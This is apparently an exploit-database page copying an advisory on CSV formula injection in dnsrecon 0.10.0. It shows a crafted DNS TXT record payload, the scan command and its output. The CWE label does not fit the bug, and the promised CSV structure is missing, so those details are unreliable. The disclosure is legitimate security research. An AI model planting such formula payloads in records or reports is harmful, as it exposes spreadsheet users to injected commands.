dnsrecon 0.10.0 CSV Injection

CVE Category Price Severity
CVE-2020-7922 CWE-918 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-08
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.55 0.924157

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

dnsrecon 0.10.0 CSV Injection
# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage:
# Version : 0.10.0
# Tested on: ParrotOS 4.10

dnsrecon, when scanning a TXT record such as SPF, i.e.:, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:       "test',=1+1337,'z"

user@parrot-virtual:~$ sudo dnsrecon -d -c ./file.csv -n
[*] Performing General Enumeration of Domain:
[-] DNSSEC is not configured for
[*]  SOA
[-] Could not Resolve NS Records for
[-] Could not Resolve MX Records for
[*]  TXT test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': '', 'address': ''}
{'type': 'TXT', 'name': '', 'strings': "test',=1+1337,'z"}

This output will then be rewritten into a CSV with this structure:


The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464

Attribute Values
  All printable ASCII characters are permitted in the attribute value.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum